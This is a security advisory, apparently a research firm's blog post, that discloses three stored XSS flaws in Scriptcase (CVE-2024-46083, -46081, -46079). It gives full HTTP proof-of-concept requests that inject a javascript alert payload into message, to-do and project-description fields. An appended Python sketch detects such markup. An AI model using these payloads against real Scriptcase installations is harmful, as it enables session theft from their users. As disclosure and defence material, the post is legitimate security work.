Zero-Day Alert: Scriptcase Vulnerabilities (XSS) 

As described in our previous post, “Zero-Day Alert: Scriptcase Vulnerabilities (RCE)”, we have also identified XSS vulnerabilities in the latest versions of Scriptcase. Given that our researchers have discovered multiple XSS entry points, both stored and reflected, we have decided to create this post to document each entry point, assign the respective CVEs, and provide a brief explanation of why each is exploitable, along with the corresponding proof of concept.

The summary of all the XSS vulnerabilities discovered includes the following parameters and features:

  • Tools -> Inbox Messages (Cross-Site Scripting Stored) -> msg.php (id_form_msg_title param)
  • Tools -> To-Do List (Cross-Site Scripting Stored) -> todo.php (todo_title param)
  • New Project -> Project Description (Cross-Site Scripting Stored) -> proj_new.php (Descricao param)

Below, you will find more details for each one described above.

Inbox Messages Feature (Stored XSS) – CVE-2024-46083

Request

POST /scriptcase/devel/iface/msg.php HTTP/1.1
Host: 192.168.0.135:8098
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 184
Origin: http://192.168.0.135:8098
Connection: keep-alive
Referer: http://192.168.0.135:8098/scriptcase/devel/iface/msg.php?randjs=WUBhiNNAgPJY2TzN
Cookie: sc_lang=en_us; ultimoUsuario=admin%3AN; sales1.scriptcase-_zldp=%2Blf8JBkbzCTSHkc7VgLZ%2Bs20VC49W6FwkADNdT1JaLg8d3eUTZpT1C0zUSr9Td09Ys2JwMsmvgM%3D; sales1.scriptcase-_zldt=fcd48804-fed3-4f18-b5f4-81013661c968-2; PHPSESSID=t06qbet69tma8k089enho0fblm
Priority: u=1

ajax=S&option=send_msgs&id_form_msg_to=_#NM#_admin&id_form_msg_title=<iframe src="javascript:alert(document.cookie)"></iframe>&id_form_msg_description=Hawktesters

Response

HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 02:20:59 GMT
Server: Apache/2.4.59 (Unix) OpenSSL/1.1.1w mod_fastcgi/mod_fastcgi-SNAP-0910052141
X-Powered-By: PHP/8.1.28
X-XSS-Protection: 0; mode=block
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 2

OK

To-Do List – Title Feature (Stored XSS) – CVE-2024-46081

Request

POST /scriptcase/devel/iface/todo.php HTTP/1.1
Host: 192.168.0.135:8098
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 291
Origin: http://192.168.0.135:8098
Connection: keep-alive
Referer: http://192.168.0.135:8098/scriptcase/devel/iface/todo.php?randjs=g56GIvb30jO1AmjK
Cookie: sc_lang=en_us; ultimoUsuario=admin%3AN; sales1.scriptcase-_zldp=%2Blf8JBkbzCTSHkc7VgLZ%2Bs20VC49W6FwkADNdT1JaLg8d3eUTZpT1C0zUSr9Td09Ys2JwMsmvgM%3D; sales1.scriptcase-_zldt=fcd48804-fed3-4f18-b5f4-81013661c968-2; PHPSESSID=t06qbet69tma8k089enho0fblm
Priority: u=1

ajax=S&option=save_todo_item&todo_codigo=1&todo_folder=public&todo_title=%3Ciframe+src%3D%22javascript%3Aalert(document.cookie)%22%3E%3C%2Fiframe%3E&todo_perc=0&todo_deadline_date=08%2F15%2F2024&todo_deadline_time=00%3A00&todo_resp=admin&todo_per1=&todo_description=Hawktesters&todo_cod_apl=

Response

HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 02:49:07 GMT
Server: Apache/2.4.59 (Unix) OpenSSL/1.1.1w mod_fastcgi/mod_fastcgi-SNAP-0910052141
X-Powered-By: PHP/8.1.28
X-XSS-Protection: 0; mode=block
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8

OK_@NM@_

New Project (Stored XSS) – CVE-2024-46079

Request

POST /scriptcase/devel/iface/proj_new.php?randjs=B0kcG2c9Bb28g6r HTTP/1.1
Host: 192.168.0.135:8098
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1449
Origin: http://192.168.0.135:8098
Connection: keep-alive
Referer: http://192.168.0.135:8098/scriptcase/devel/iface/proj_new.php?randjs=B0kcG2c9Bb28g6r
Cookie: sc_lang=en_us; ultimoUsuario=admin%3AS; ultimoProjetoUsado=admin%3ARGfyz5xKK8iOhSQ1nYKu1Z6VCDylZY61nsIshqakeA7LKmM27ZjtTTmL3Ns0DWzcgFKqGq7JkVzi1weircc1HvcP74am40FHfO1lJ6uBsD4YE5wwL6cLBe7fhbSneusIgq1ZFQIpAuZAmlGZKVYYtYyI4ximwuSLRc0YKobffR0bu1eW0yFayvOq6h6Wd6HfLqYYTTgHVWWUyz6N6ODuiRda3XR3MGDrg5eMMzPbQEtEKlWMz362BWGFw4K3qikQ%3A0fb3879e0027e2a395edc960c3f107ad46de46fdff0db3f88a47ff322b6ccb9e; sales1.scriptcase-_zldp=%2Blf8JBkbzCTSHkc7VgLZ%2Bs20VC49W6FwkADNdT1JaLg8d3eUTZpT1C0zUSr9Td09Ys2JwMsmvgM%3D; sales1.scriptcase-_zldt=fcd48804-fed3-4f18-b5f4-81013661c968-2; PHPSESSID=t06qbet69tma8k089enho0fblm
Upgrade-Insecure-Requests: 1
Priority: u=4

imported=crm&base=&friendly_url=S&logomarca=sys__NM__crm.png&Cod_Prj=CRM2&Descricao=<iframe src="javascript:alert(document.cookie)"></iframe>&longdesc=Hawktesters&ver_major=1...SNIP...

Response

HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 04:06:52 GMT
Server: Apache/2.4.59 (Unix) OpenSSL/1.1.1w mod_fastcgi/mod_fastcgi-SNAP-0910052141
X-Powered-By: PHP/8.1.28
X-XSS-Protection: 0; mode=block
Expires: Fri, Jan 01 1900 00:00:00 GMT
Last-Modified: Mon, 12 Aug 2024 04:06:52 GMT
Cache-Control: max-age=15, s-maxage=0, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 10727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
 <title>ScriptCase - Create New Project</title>
 ...SNIP...
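
For defenders, a detection sketch for the three entry points documented above. This is an added example, not part of the original advisory and not Scriptcase code. It checks POST bodies sent to msg.php, todo.php and proj_new.php for markup in the affected parameters. The function names, the markup heuristic and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Endpoint path -> parameter the advisory lists as a stored-XSS entry point.
WATCHED = {
    "/scriptcase/devel/iface/msg.php": "id_form_msg_title",
    "/scriptcase/devel/iface/todo.php": "todo_title",
    "/scriptcase/devel/iface/proj_new.php": "Descricao",
}

# Assumption: a tag opener ("<x", "</x", "<!") or a javascript: URL scheme
# is not expected in a title or description field in normal use.
MARKUP = re.compile(r"<[/!]?[a-z]|javascript\s*:", re.IGNORECASE)


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target, body):
    """Return [(param, decoded_value)] for watched params that carry markup."""
    param = WATCHED.get(urlsplit(target).path)
    if param is None:
        return []
    hits = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name == param:
            value = decode_fully(value)
            if MARKUP.search(value):
                hits.append((name, value))
    return hits


# Constructed samples (request target, form body), modelled on the requests above.
SAMPLES = [
    ("/scriptcase/devel/iface/todo.php?randjs=x",
     "option=save_todo_item&todo_title=%3Ciframe+src%3D%22javascript%3Aalert(document.cookie)%22%3E%3C%2Fiframe%3E"),
    ("/scriptcase/devel/iface/todo.php", "option=save_todo_item&todo_title=Review+Q3+budget"),
    ("/scriptcase/devel/iface/msg.php", "option=send_msgs&id_form_msg_title=%253Cb%253Ehi"),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(target, "->", inspect_request(target, body) or "clean")
```

The check only covers the parameters named in this post; it is a log or proxy-side alert, and does not replace output encoding of these fields where they are rendered.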

 

Timeline

Conclusions

If you enjoyed the article and you are interested in learning more about 0-days, exploits and cybersecurity, make sure to check out the rest of our articles.

If you are a researcher and want to be part of our team, get in touch with us. We are always looking for talent.

